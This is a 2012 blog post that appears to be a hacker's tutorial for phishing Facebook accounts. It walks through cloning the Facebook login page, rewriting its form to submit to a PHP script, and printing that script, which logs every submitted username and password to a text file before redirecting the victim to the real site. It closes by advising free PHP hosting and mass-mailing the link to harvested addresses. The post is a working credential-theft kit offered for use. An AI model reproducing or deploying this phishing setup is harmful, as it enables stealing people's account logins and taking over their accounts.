Friday, March 2, 2012

H-ack fb a/c

1st of awl 10x to W@rl0(k who teach me how to hack 


m Pyt@n bt m nthng widout him 



Hi dudes,
some people asked me to make a tutorial for facebook hacking.
What we'll gona do now is called pishing.


1) Go to: www.facebook.com/login.php
Right click on a white space and press view source code.
Copy it all and paste it in notepad.


2) Search in notpad (Crtl+f) for 'action'.
Change it to action="next.php"
Then on the left change: method="get" instead of "POST"


You would have something like this:
<form method="get" action="next.php" id="login_form">


Save it as index.php (save as unicode)


3) Now we need to make a next.php so:
open notepad again and paste this code:


:<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> 


And save it as next.php
For safety: change passwords.txt to login.txt


Now make in notepad a login.txt file.
Save as login.txt and leave blank.


4) Congratiulations! You made you're own facebook phisher!!!
Now upload those 3 files (index.php ;next.php and login.txt) on a hosting site.
(they must support php!)


I suggest to use 110mb(.)com and t35(.)com


5) Send the link to some e-mail-accounts.
You can search for 'mass-mails' to have some e-mails.




No comments:

Post a Comment